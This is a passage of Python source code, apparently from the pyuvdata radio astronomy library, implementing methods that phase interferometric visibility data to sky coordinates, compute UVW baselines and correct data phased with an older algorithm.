self.phase_center_ra = None
self.phase_center_dec = None
self.phase_center_epoch = None
self._set_drift()
def _phase_dict_helper(
self,
ra,
dec,
epoch,
phase_frame,
ephem_times,
cat_type,
pm_ra,
pm_dec,
dist,
vrad,
cat_name,
lookup_name,
select_mask,
time_array,
):
"""
Supplies a dictionary with parametrs for the phase method to use.
This method should not be called directly by users; it is instead a function
called by the `phase` method, which packages up phase center information
into a single dictionary to allow for consistent behavior between different
instantiations of `UVData` objects.
"""
cat_id = None
info_source = "user"
if self.multi_phase_center:
name_list = list(self.phase_center_catalog.keys())
else:
name_list = [self.object_name]
# We only want to use the JPL-Horizons service if using a non-mutli-phase-ctr
# instance of a UVData object.
if lookup_name and (cat_name not in name_list) and self.multi_phase_center:
if (cat_type is None) or (cat_type == "ephem"):
[
cat_times,
cat_lon,
cat_lat,
cat_dist,
cat_vrad,
] = uvutils.lookup_jplhorizons(
cat_name,
time_array,
telescope_loc=self.telescope_location_lat_lon_alt,
)
cat_type = "ephem"
cat_pm_ra = cat_pm_dec = None
cat_epoch = 2000.0
cat_frame = "icrs"
info_source = "jplh"
else:
raise ValueError(
"Unable to find %s in among the existing sources "
"recorded in the catalog. Please supply source "
"information (e.g., RA and Dec coordinates) and "
"set lookup_name=False." % cat_name
)
elif (cat_name in name_list) and self.multi_phase_center:
# If the name of the source matches, then verify that all of its
# properties are the same as what is stored in phase_center_catalog.
if lookup_name:
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
cat_diffs = 0
else:
cat_id, cat_diffs = self._look_in_catalog(
cat_name,
cat_type=cat_type,
cat_lon=ra,
cat_lat=dec,
cat_frame=phase_frame,
cat_epoch=epoch,
cat_times=ephem_times,
cat_pm_ra=pm_ra,
cat_pm_dec=pm_dec,
cat_dist=dist,
cat_vrad=vrad,
)
# If cat_diffs > 0, it means that the catalog entries dont match
if cat_diffs != 0:
# Last chance here -- if we have selected all of the data phased
# to this phase center, then we are still okay.
if select_mask is None:
# We have selected all data, so we're good
pass
elif np.all(
np.not_equal(
self.phase_center_id_array[~select_mask],
self.phase_center_catalog[cat_name]["cat_id"],
)
):
# We have selected a subset of the data that contains
# everything that was phased to the object
pass
else:
raise ValueError(
"The entry name %s is not unique, but arguments to phase "
"do not match that stored in phase_center_catalog. Try using a "
"different name, using select_mask to select all data "
"phased to this phase center, or using the existing phase "
"center information by setting lookup_name=True." % cat_name
)
cat_type = "sidereal" if cat_type is None else cat_type
cat_lon = ra
cat_lat = dec
cat_frame = phase_frame
cat_epoch = epoch
cat_times = ephem_times
cat_pm_ra = pm_ra
cat_pm_dec = pm_dec
cat_dist = dist
cat_vrad = vrad
else:
temp_dict = self.phase_center_catalog[cat_name]
cat_id = temp_dict["cat_id"]
cat_type = temp_dict["cat_type"]
info_source = temp_dict["info_source"]
# Get here will return None if no key found, which we want
cat_lon = temp_dict.get("cat_lon")
cat_lat = temp_dict.get("cat_lat")
cat_frame = temp_dict.get("cat_frame")
cat_epoch = temp_dict.get("cat_epoch")
cat_times = temp_dict.get("cat_times")
cat_pm_ra = temp_dict.get("cat_pm_ra")
cat_pm_dec = temp_dict.get("cat_pm_dec")
cat_dist = temp_dict.get("cat_dist")
cat_vrad = temp_dict.get("cat_vrad")
else:
# Either this is not a multi phase center data set, or the name of the
# source is unique!
cat_type = "sidereal" if cat_type is None else cat_type
cat_lon = ra
cat_lat = dec
cat_frame = phase_frame
cat_epoch = epoch
cat_times = ephem_times
cat_pm_ra = pm_ra
cat_pm_dec = pm_dec
cat_dist = dist
cat_vrad = vrad
if cat_epoch is None:
cat_epoch = 1950.0 if (cat_frame in ["fk4", "fk4noeterms"]) else 2000.0
if isinstance(cat_epoch, str) or isinstance(cat_epoch, Time):
cat_epoch = Time(cat_epoch).to_value(
"byear" if cat_frame in ["fk4", "fk4noeterms"] else "jyear"
)
# One last check - if we have an ephem phase center, lets make sure that the
# time range of the ephemeris encapsulates the entire range of time_array
check_ephem = False
if cat_type == "ephem":
# Take advantage of this to make sure that lat, lon, and times are all
# ndarray types
cat_lon = np.array(cat_lon, dtype=float)
cat_lat = np.array(cat_lat, dtype=float)
cat_times = np.array(cat_times, dtype=float)
cat_lon.shape += (1,) if (cat_lon.ndim == 0) else ()
cat_lat.shape += (1,) if (cat_lat.ndim == 0) else ()
cat_times.shape += (1,) if (cat_times.ndim == 0) else ()
check_ephem = np.min(time_array) < np.min(cat_times)
check_ephem = check_ephem or (np.max(time_array) > np.max(cat_times))
# If the ephem was supplied by JPL-Horizons, then we can easily expand
# it to cover the requested range.
if check_ephem and (info_source == "jplh"):
# Concat the two time ranges to make sure that we cover both the
# requested time range _and_ the original time range.
[
cat_times,
cat_lon,
cat_lat,
cat_dist,
cat_vrad,
] = uvutils.lookup_jplhorizons(
cat_name,
np.concatenate((np.reshape(time_array, -1), cat_times)),
telescope_loc=self.telescope_location_lat_lon_alt,
)
elif check_ephem:
# The ephem was user-supplied during the call to the phase method,
# raise an error to ask for more ephem data.
raise ValueError(
"Ephemeris data does not cover the entirety of the time range "
"attempted to be phased. Please supply additional ephem data "
"(and if used, set lookup_name=False)."
)
# Time to repackage everything into a dict
phase_dict = {
"cat_name": cat_name,
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_dist": cat_dist,
"cat_vrad": cat_vrad,
"info_source": info_source,
"cat_id": cat_id,
}
# Finally, make sure everything is a float or an ndarray of floats
for key in phase_dict.keys():
if isinstance(phase_dict[key], np.ndarray):
phase_dict[key] = phase_dict[key].astype(float)
elif (key == "cat_id") and (phase_dict[key] is not None):
# If this is the cat_id, make it an int
phase_dict[key] == int(phase_dict[key])
elif not ((phase_dict[key] is None) or isinstance(phase_dict[key], str)):
phase_dict[key] = float(phase_dict[key])
return phase_dict
def phase(
self,
ra,
dec,
epoch="J2000",
phase_frame="icrs",
cat_type=None,
ephem_times=None,
pm_ra=None,
pm_dec=None,
dist=None,
vrad=None,
cat_name=None,
lookup_name=False,
use_ant_pos=True,
allow_rephase=True,
orig_phase_frame=None,
select_mask=None,
cleanup_old_sources=True,
use_old_proj=False,
fix_old_proj=True,
):
"""
Phase a drift scan dataset to a single ra/dec at a particular epoch.
See the phasing memo under docs/references for more documentation.
Tested against MWA_Tools/CONV2UVFITS/convutils.
Parameters
----------
ra : float
The ra to phase to in radians.
dec : float
The dec to phase to in radians.
epoch : astropy.time.Time object or str
The epoch to use for phasing. Either an astropy Time object or the
string "J2000" (which is the default).
Note that the epoch is only used to evaluate the ra & dec values,
if the epoch is not J2000, the ra & dec values are interpreted
as FK5 ra/dec values and transformed to J2000, the data are then
phased to the J2000 ra/dec values.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
cat_type : str
Type of phase center to be added. Must be one of:
"sidereal" (fixed RA/Dec), "ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position). Default is "sidereal", other selections
are only permissible if `multi_phase_center=True`.
ephem_times : ndarray of float
Only used when `cat_type="ephem"`. Describes the time for which the values
of `cat_lon` and `cat_lat` are caclulated, in units of JD. Shape is (Npts,).
pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_name :str
Name of the phase center being phased to. Required if
`multi_phase_center=True`, otherwise `object_name` set to this value.
lookup_name : bool
Only used if `multi_phase_center=True`, allows the user to lookup phase
center infomation in `phase_center_catalog` (for the entry matching
`cat_name`). Setting this to `True` will ignore the values supplied to the
`ra`, `dec`, `epoch`, `phase_frame`, `pm_ra`, `pm_dec`, `dist`, `vrad`.
use_ant_pos : bool
If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws.
allow_rephase : bool
If True, allow unphasing and rephasing if this object is already
phased.
orig_phase_frame : str
The original phase frame of this object (to use in unphasing). Only
used if the object is already phased, `allow_rephase` is True and
the phase_center_ra/dec of the object does not match `ra` and `dec`.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None.
select_mask : ndarray of bool
Optional mask for selecting which data to operate on along the blt-axis,
only used if with multi phase center data sets (i.e.,
`multi_phase_center=True`). Shape is (Nblts,).
use_old_proj : bool
If True, use the "old" method for calculating baseline uvw-coordinates,
which involved using astropy to move antenna positions (in ITRF) into
the requested reference frame (either GCRS or ICRS). Default is False.
fix_old_proj : bool
If True, the method will convert a data set with coordinates calculated
using the "old" method, correct them, and then produce new coordinates
using the "new" method.
Raises
------
ValueError
If the phase_type is 'phased' and allow_rephase is False
"""
# Non-multi phase center datasets don't (yet) have a way of recording the
# 'extra' source properties, or selection mask, so make sure that these aren't
# using any of those if looking at a single object.
if not self.multi_phase_center:
if select_mask is not None:
raise ValueError(
"Cannot apply a selection mask if multi_phase_center=False. "
"Remove the select_mask argument to continue."
)
check_params = [pm_ra, pm_dec, dist, vrad]
check_names = ["pm_ra", "pm_dec", "dist", "vrad"]
for name, value in zip(check_names, check_params):
if value not in [0, None]:
raise ValueError(
"Non-zero values of %s not supported when "
"multi_phase_center=False." % name
)
if (cat_type != "sidereal") and (cat_type is not None):
raise ValueError(
"Only sidereal sources are supported when multi_phase_center=False"
)
if lookup_name:
raise ValueError(
"Object name lookup is not supported when multi_phase_center=False"
)
else:
if cat_name is None:
raise ValueError(
"Must supply a unique name for cat_name when phasing a "
"multi phase center data set."
)
# If you are a multi phase center data set, there's no valid reason to be going
# back to the old phase method. Time to bail!
if self.multi_phase_center and use_old_proj:
raise NotImplementedError(
"Multi phase center data sets are not compatible with the old phasing "
"method, please set use_old_proj=False."
)
if not allow_rephase and (self.phase_type == "phased"):
raise ValueError(
"The data is already phased; set allow_rephase"
" to True to unphase and rephase."
)
# Right up front, we're gonna split off the piece of the code that
# does the phasing using the "new" method, since its a lot more flexible
# and because I think at some point, everything outside of this loop
# can be deprecated
if not use_old_proj:
needs_fix = (
(not use_ant_pos)
and (self.phase_type == "phased")
and (
self.phase_center_app_ra is None
or self.phase_center_app_dec is None
)
)
if needs_fix:
if fix_old_proj:
# So to fix the 'old' projection, we use the unphase_to_drift
# method with the 'old' projection to bring the data set back
# to ENU, and then we can move from there. Of course, none of
# this is actually neccessary if calculating the coordinates
# from antenna positions, so you do you, puvudataset.
self.unphase_to_drift(
phase_frame=orig_phase_frame,
use_old_proj=True,
use_ant_pos=use_ant_pos,
)
else:
raise AttributeError(
"Data missing phase_center_ra_app or phase_center_dec_app, "
"which implies that the data were phased using the 'old' "
"method for phasing (which is not compatible with the new "
"version of the code). You can fix this by calling the "
"phase method with fix_old_proj=True, or can otherwise "
"proceed by using the 'old' projection method by setting "
"use_old_proj=True."
)
# Grab all the meta-data we need for the rotations
time_array = self.time_array
lst_array = self.lst_array
uvw_array = self.uvw_array
ant_1_array = self.ant_1_array
ant_2_array = self.ant_2_array
old_w_vals = self.uvw_array[:, 2].copy()
old_w_vals[self._check_for_unphased()] = 0.0
old_app_ra = self.phase_center_app_ra
old_app_dec = self.phase_center_app_dec
old_frame_pa = self.phase_center_frame_pa
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
if select_mask is not None:
if len(select_mask) != self.Nblts:
raise IndexError("Selection mask must be of length Nblts.")
time_array = time_array[select_mask]
lst_array = lst_array[select_mask]
uvw_array = uvw_array[select_mask, :]
ant_1_array = ant_1_array[select_mask]
ant_2_array = ant_2_array[select_mask]
if isinstance(old_w_vals, np.ndarray):
old_w_vals = old_w_vals[select_mask]
# Before moving forward with the heavy calculations, we need to do some
# basic housekeeping to make sure that we've got the coordinate data that
# we need in order to proceed.
phase_dict = self._phase_dict_helper(
ra,
dec,
epoch,
phase_frame,
ephem_times,
cat_type,
pm_ra,
pm_dec,
dist,
vrad,
cat_name,
lookup_name,
select_mask,
time_array,
)
# We got the meta-data, now handle calculating the apparent coordinates.
# First, check if we need to look up the phase center in question
new_app_ra, new_app_dec = uvutils.calc_app_coords(
phase_dict["cat_lon"],
phase_dict["cat_lat"],
coord_frame=phase_dict["cat_frame"],
coord_epoch=phase_dict["cat_epoch"],
coord_times=phase_dict["cat_times"],
coord_type=phase_dict["cat_type"],
time_array=time_array,
lst_array=lst_array,
pm_ra=phase_dict["cat_pm_ra"],
pm_dec=phase_dict["cat_pm_dec"],
vrad=phase_dict["cat_vrad"],
dist=phase_dict["cat_dist"],
telescope_loc=self.telescope_location_lat_lon_alt,
)
# Now calculate position angles. If this is a single phase center data set,
# the ref frame is always equal to the source coordinate frame. In a multi
# phase center data set, those two components are allowed to be decoupled.
new_frame_pa = uvutils.calc_frame_pos_angle(
time_array,
new_app_ra,
new_app_dec,
self.telescope_location_lat_lon_alt,
self.phase_center_frame if self.multi_phase_center else phase_frame,
ref_epoch=self.phase_center_epoch if self.multi_phase_center else epoch,
)
# Now its time to do some rotations and calculate the new coordinates
new_uvw = uvutils.calc_uvw(
app_ra=new_app_ra,
app_dec=new_app_dec,
frame_pa=new_frame_pa,
lst_array=lst_array,
use_ant_pos=use_ant_pos,
uvw_array=uvw_array,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=ant_1_array,
ant_2_array=ant_2_array,
old_app_ra=old_app_ra,
old_app_dec=old_app_dec,
old_frame_pa=old_frame_pa,
telescope_lat=self.telescope_location_lat_lon_alt[0],
telescope_lon=self.telescope_location_lat_lon_alt[1],
from_enu=(self.phase_type == "drift"),
)
# With all operations complete, we now start manipulating the UVData object
if self.multi_phase_center:
cat_id = self._add_phase_center(
phase_dict["cat_name"],
phase_dict["cat_type"],
cat_lon=phase_dict["cat_lon"],
cat_lat=phase_dict["cat_lat"],
cat_frame=phase_dict["cat_frame"],
cat_epoch=phase_dict["cat_epoch"],
cat_times=phase_dict["cat_times"],
cat_pm_ra=phase_dict["cat_pm_ra"],
cat_pm_dec=phase_dict["cat_pm_dec"],
cat_dist=phase_dict["cat_dist"],
cat_vrad=phase_dict["cat_vrad"],
info_source=phase_dict["info_source"],
cat_id=phase_dict["cat_id"],
force_update=True,
)
# Now its time to update the raw data. This will return empty if
# metadata_only is set to True. Note that cat_type is only allowed
# to be unphased if this is a multi_phase_center data set.
new_w_vals = 0.0 if (cat_type == "unphased") else new_uvw[:, 2]
self._apply_w_proj(new_w_vals, old_w_vals, select_mask=select_mask)
# Finally, we now take it upon ourselves to update some metadata. What we
# do here will depend a little bit on whether or not we have a selection
# mask active, since most everything is affected by that.
if select_mask is not None:
self.uvw_array[select_mask] = new_uvw
self.phase_center_app_ra[select_mask] = new_app_ra
self.phase_center_app_dec[select_mask] = new_app_dec
self.phase_center_frame_pa[select_mask] = new_frame_pa
if self.multi_phase_center:
self.phase_center_id_array[select_mask] = cat_id
else:
self.uvw_array = new_uvw
self.phase_center_app_ra = new_app_ra
self.phase_center_app_dec = new_app_dec
self.phase_center_frame_pa = new_frame_pa
if self.multi_phase_center:
self.phase_center_id_array[:] = cat_id
# If not multi phase center, make sure to update the ra/dec values, since
# otherwise we'll have no record of source properties.
if not self.multi_phase_center:
# Make sure this is actually marked as a phased dataset now
self._set_phased()
# Update the phase center properties
self.phase_center_ra = phase_dict["cat_lon"]
self.phase_center_dec = phase_dict["cat_lat"]
self.phase_center_epoch = phase_dict["cat_epoch"]
self.phase_center_frame = phase_dict["cat_frame"]
if cat_name is not None:
self.object_name = cat_name
else:
self.phase_center_ra = 0.0
self.phase_center_dec = 0.0
self.phase_center_epoch = 2000.0
if cleanup_old_sources:
self._clear_unused_phase_centers()
# All done w/ the new phase method
return
warnings.warn(
"The original `phase` method is deprecated, and will be removed in "
"pyuvdata v3.0 (although `fix_phase` will remain for longer). "
"Note that the old and new phase methods are NOT compatible with one "
"another, so if you have phased using the old method, you should call "
"the phase method with fix_old_proj=True, or otherwise can use the "
"unphase_to_drift method with use_old_proj=True to undo the old "
"corrections before using the new version of the phase method.",
DeprecationWarning,
)
if self.phase_type == "drift":
pass
elif self.phase_type == "phased":
# To get to this point, allow_rephase has to be true
if not np.isclose(
self.phase_center_ra,
ra,
rtol=self._phase_center_ra.tols[0],
atol=self._phase_center_ra.tols[1],
) or not np.isclose(
self.phase_center_dec,
dec,
rtol=self._phase_center_dec.tols[0],
atol=self._phase_center_dec.tols[1],
):
self.unphase_to_drift(
phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
use_old_proj=True,
)
else:
raise ValueError(
"The phasing type of the data is unknown. "
'Set the phase_type to "drift" or "phased" to '
"reflect the phasing status of the data"
)
if phase_frame not in ["icrs", "gcrs"]:
raise ValueError("phase_frame can only be set to icrs or gcrs.")
if epoch == "J2000" or epoch == 2000:
icrs_coord = SkyCoord(ra=ra, dec=dec, unit="radian", frame="icrs")
else:
assert isinstance(epoch, Time)
phase_center_coord = SkyCoord(
ra=ra, dec=dec, unit="radian", equinox=epoch, frame=FK5
)
# convert to icrs (i.e. J2000) to write to object
icrs_coord = phase_center_coord.transform_to("icrs")
self.phase_center_ra = icrs_coord.ra.radian
self.phase_center_dec = icrs_coord.dec.radian
self.phase_center_epoch = 2000.0
self.phase_center_app_ra = None
self.phase_center_app_dec = None
self.phase_center_frame_pa = None
if phase_frame == "icrs":
frame_phase_center = icrs_coord
else:
# use center of observation for obstime for gcrs
center_time = np.mean([np.max(self.time_array), np.min(self.time_array)])
icrs_coord.obstime = Time(center_time, format="jd")
frame_phase_center = icrs_coord.transform_to("gcrs")
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
self.uvw_array = np.float64(self.uvw_array)
unique_times, unique_inds = np.unique(self.time_array, return_index=True)
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit=units.m
)
obs_times = Time(unique_times, format="jd")
itrs_telescope_locations = telescope_location.get_itrs(obstime=obs_times)
itrs_telescope_locations = SkyCoord(itrs_telescope_locations)
# just calling transform_to(coord.GCRS) will delete the obstime information
# need to re-add obstimes for a GCRS transformation
if phase_frame == "gcrs":
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())(obstime=obs_times)
)
else:
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())
)
# set the representation_type to cartensian to get xyz later
frame_telescope_locations.representation_type = "cartesian"
for ind, jd in enumerate(unique_times):
inds = np.where(self.time_array == jd)[0]
obs_time = obs_times[ind]
itrs_lat_lon_alt = self.telescope_location_lat_lon_alt
frame_telescope_location = frame_telescope_locations[ind]
if use_ant_pos:
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
ecef_ant_pos = (
np.float64(self.antenna_positions) + self.telescope_location
)
itrs_ant_coord = SkyCoord(
x=ecef_ant_pos[:, 0] * units.m,
y=ecef_ant_pos[:, 1] * units.m,
z=ecef_ant_pos[:, 2] * units.m,
frame="itrs",
obstime=obs_time,
)
frame_ant_coord = itrs_ant_coord.transform_to(phase_frame)
frame_ant_rel = (
(frame_ant_coord.cartesian - frame_telescope_location.cartesian)
.get_xyz()
.T.value
)
frame_ant_uvw = uvutils.phase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, frame_ant_rel
)
# instead of looping through every ind, find the spot in antenna number
# array where ant_num <= ant1 < ant_number and similarly for ant2
# for all baselines in inds
# then find the uvw coordinate for all at the same time
# antenna_numbers does not necessarily need to be in order on the object
# but needs to be in order for the searchsorted to work.
# ant1_index and ant2_index arrays will preserve the order of blts
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[inds]
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[inds]
)
self.uvw_array[inds] = (
frame_ant_uvw[ant_sort][ant2_index, :]
- frame_ant_uvw[ant_sort][ant1_index, :]
)
else:
# Also, uvws should be thought of like ENU, not ECEF (or rotated ECEF)
# convert them to ECEF to transform between frames
uvws_use = self.uvw_array[inds, :]
uvw_ecef = uvutils.ECEF_from_ENU(uvws_use, *itrs_lat_lon_alt)
itrs_uvw_coord = SkyCoord(
x=uvw_ecef[:, 0] * units.m,
y=uvw_ecef[:, 1] * units.m,
z=uvw_ecef[:, 2] * units.m,
frame="itrs",
obstime=obs_time,
)
frame_uvw_coord = itrs_uvw_coord.transform_to(phase_frame)
# this takes out the telescope location in the new frame,
# so these are vectors again
frame_rel_uvw = (
frame_uvw_coord.cartesian.get_xyz().value.T
- frame_telescope_location.cartesian.get_xyz().value
)
self.uvw_array[inds, :] = uvutils.phase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, frame_rel_uvw
)
# calculate data and apply phasor
if not self.metadata_only:
w_lambda = (
self.uvw_array[:, 2].reshape(self.Nblts, 1)
/ const.c.to("m/s").value
* self.freq_array.reshape(1, self.Nfreqs)
)
if self.future_array_shapes:
phs = np.exp(-1j * 2 * np.pi * w_lambda[:, :, None])
else:
phs = np.exp(-1j * 2 * np.pi * w_lambda[:, None, :, None])
self.data_array *= phs
self.phase_center_frame = phase_frame
self._set_phased()
def phase_to_time(
self,
time,
phase_frame="icrs",
use_ant_pos=True,
use_old_proj=False,
allow_rephase=True,
orig_phase_frame=None,
select_mask=None,
):
"""
Phase a drift scan dataset to the ra/dec of zenith at a particular time.
See the phasing memo under docs/references for more documentation.
Parameters
----------
time : astropy.time.Time object or float
The time to phase to, an astropy Time object or a float Julian Date
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
use_ant_pos : bool
If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws.
allow_rephase : bool
If True, allow unphasing and rephasing if this object is already
phased.
orig_phase_frame : str
The original phase frame of this object (to use in unphasing). Only
used if the object is already phased, `allow_rephase` is True and
the phase_center_ra/dec of the object does not match `ra` and `dec`.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None.
select_mask : array_like
Selection mask for which data should be rephased, only applicable if
`multi_phase_center=True`. Any array-like able to be used as an index
is suitable -- the most typical is an array of bool with length `Nblts`,
or an array of ints within the range (-Nblts, Nblts).
Raises
------
ValueError
If the phase_type is not 'drift'
TypeError
If time is not an astropy.time.Time object or Julian Date as a float
"""
if isinstance(time, (float, np.floating)):
time = Time(time, format="jd")
if not isinstance(time, Time):
raise TypeError("time must be an astropy.time.Time object or a float")
# Generate ra/dec of zenith at time in the phase_frame coordinate
# system to use for phasing
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit="m"
)
zenith_coord = SkyCoord(
alt=Angle(90 * units.deg),
az=Angle(0 * units.deg),
obstime=time,
frame="altaz",
location=telescope_location,
)
obs_zenith_coord = zenith_coord.transform_to(phase_frame)
zenith_ra = obs_zenith_coord.ra.rad
zenith_dec = obs_zenith_coord.dec.rad
self.phase(
zenith_ra,
zenith_dec,
epoch="J2000",
phase_frame=phase_frame,
use_ant_pos=use_ant_pos,
use_old_proj=use_old_proj,
allow_rephase=allow_rephase,
orig_phase_frame=orig_phase_frame,
select_mask=select_mask,
cat_name=("zenith_at_jd%f" % self.time_array[0])
if self.multi_phase_center
else None,
)
def set_uvws_from_antenna_positions(
self,
allow_phasing=False,
require_phasing=True,
orig_phase_frame=None,
output_phase_frame="icrs",
use_old_proj=False,
):
"""
Calculate UVWs based on antenna_positions.
Parameters
----------
allow_phasing : bool
Option for phased data. If data is phased and allow_phasing=True,
UVWs will be calculated and the visibilities will be rephased. Default
is False.
require_phasing : bool
Option for phased data. If data is phased and require_phasing=True, then
the method will throw an error unless allow_phasing=True, otherwise if
`require_phasing=False` and `allow_phasing=False`, the UVWs will be
recalculated but the data will NOT be rephased. This feature should only be
used in limited circumstances (e.g., when certain metadata like exact time
are not trusted), as misuse can significantly corrupt data.
orig_phase_frame : str
The astropy frame to phase from. Either 'icrs' or 'gcrs'.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None. Only used if allow_phasing is True and use_old_proj
is True.
output_phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'. Only used if
allow_phasing is True, and use_old_proj is True.
use_old_proj : bool
If set to True, uses the 'old' method of calculating baseline vectors.
Default is False, which will instead use the 'new' method.
Raises
------
ValueError
If data is phased and allow_phasing is False.
Warns
-----
UserWarning
If the phase_type is 'phased'
"""
if not use_old_proj and not (
self.phase_center_app_ra is None or self.phase_center_app_dec is None
):
if (self.phase_type == "phased") and (
not (allow_phasing) and require_phasing
):
raise ValueError(
"UVW recalculation requires either unphased data or the ability "
"to rephase data. Use unphase_to_drift or set allow_phasing=True."
)
telescope_location = self.telescope_location_lat_lon_alt
new_uvw = uvutils.calc_uvw(
app_ra=self.phase_center_app_ra,
app_dec=self.phase_center_app_dec,
frame_pa=self.phase_center_frame_pa,
lst_array=self.lst_array,
use_ant_pos=True,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=self.ant_1_array,
ant_2_array=self.ant_2_array,
telescope_lat=telescope_location[0],
telescope_lon=telescope_location[1],
from_enu=(self.phase_type != "phased"),
to_enu=(self.phase_type != "phased"),
)
if self.phase_type == "phased":
if allow_phasing:
old_w_vals = self.uvw_array[:, 2].copy()
old_w_vals[self._check_for_unphased()] = 0.0
self._apply_w_proj(new_uvw[:, 2], old_w_vals)
else:
warnings.warn(
"Recalculating uvw_array without adjusting visibility phases "
"-- this can introduce significant errors if used incorrectly."
)
# If the data are phased, we've already adjusted the phases. Now we just
# need to update the uvw's and we are home free.
self.uvw_array = new_uvw
return
# mutli-phase-ctr datasets should never use the 'old' uvw calculation method
if self.multi_phase_center:
raise NotImplementedError(
"Multi phase center data sets are not compatible with the old uvw "
"calculation method, please set use_old_proj=False."
)
phase_type = self.phase_type
if phase_type == "phased":
if allow_phasing:
if not self.metadata_only:
warnings.warn(
"Data will be unphased and rephased "
"to calculate UVWs, which might introduce small "
"inaccuracies to the data."
)
if orig_phase_frame not in [None, "icrs", "gcrs"]:
raise ValueError(
"Invalid parameter orig_phase_frame. "
'Options are "icrs", "gcrs", or None.'
)
if output_phase_frame not in ["icrs", "gcrs"]:
raise ValueError(
"Invalid parameter output_phase_frame. "
'Options are "icrs" or "gcrs".'
)
phase_center_ra = self.phase_center_ra
phase_center_dec = self.phase_center_dec
phase_center_epoch = self.phase_center_epoch
self.unphase_to_drift(
phase_frame=orig_phase_frame, use_old_proj=True,
)
else:
raise ValueError(
"UVW calculation requires unphased data. "
"Use unphase_to_drift or set "
"allow_phasing=True."
)
antenna_locs_ENU, _ = self.get_ENU_antpos(center=False)
# this code used to loop through every bl in the unique,
# find the index into self.antenna_array of ant1 and ant2
# and fill out the self.uvw_array for all matching bls.
# instead, find the indices and reverse inds from the unique,
# create the unique ant1 and ant2 arrays
# use searchsorted to find the index of the antenna numbers into ant1 and ant2
# create the unique uvw array then broadcast to self.uvw_array
bls, unique_inds, reverse_inds = np.unique(
self.baseline_array, return_index=True, return_inverse=True
)
# antenna_numbers does not necessarily need to be in order on the object
# but needs to be in order for the searchsorted to work.
# ant1_index and ant2_index arrays will preserve the order of blts
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[unique_inds],
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[unique_inds],
)
_uvw_array = np.zeros((bls.size, 3))
_uvw_array = (
antenna_locs_ENU[ant_sort][ant2_index, :]
- antenna_locs_ENU[ant_sort][ant1_index, :]
)
self.uvw_array = _uvw_array[reverse_inds]
if phase_type == "phased":
self.phase(
phase_center_ra,
phase_center_dec,
phase_center_epoch,
phase_frame=output_phase_frame,
use_old_proj=use_old_proj,
)
def fix_phase(
self, use_ant_pos=True,
):
"""
Fix the data to be consistent with the new phasing method.
This is a simple utility function for updating UVW coordinates calculated using
the 'old' phasing algorithm with those calculated by the 'new' algorithm. Note
that this step is required for using the new methods with data phased using the
`phase` methiod prior to pyuvdata v2.2.
Parameters
----------
use_ant_pos : bool
Use the antenna positions for determining UVW coordinates. Default is True.
"""
# If we are missing apparent coordinates, we should calculate those now
if (self.phase_center_app_ra is None) or (self.phase_center_app_dec is None):
self._set_app_coords_helper()
# If we are just using the antenna positions, we don't actually need to do
# anything, since the new baseline vectors will be unaffected by the prior
# phasing method, and the delta_w values already get correctly corrected for.
if use_ant_pos:
self.set_uvws_from_antenna_positions(
allow_phasing=True, use_old_proj=False,
)
elif self.multi_phase_center:
raise ValueError(
"Cannot run fix_phase on a mutli-phase-ctr dataset without using the "
"antenna positions. Please set use_ant_pos=True."
)
else:
# Record the old values
phase_center_ra = self.phase_center_ra
phase_center_dec = self.phase_center_dec
phase_center_frame = self.phase_center_frame
phase_center_epoch = self.phase_center_epoch
cat_name = self.object_name
# Bring the UVWs back to ENU/unphased
self.unphase_to_drift(
phase_frame=self.phase_center_frame,
use_ant_pos=False,
use_old_proj=True,
)
# Check for any autos, since their uvws get potentially corrupted
# by the above operation
auto_mask = self.ant_1_array == self.ant_2_array
if any(auto_mask):
self.uvw_array[auto_mask, :] = 0.0
# And rephase the data using the new algorithm
self.phase(
phase_center_ra,
phase_center_dec,
phase_frame=phase_center_frame,
epoch=phase_center_epoch,
cat_name=cat_name,
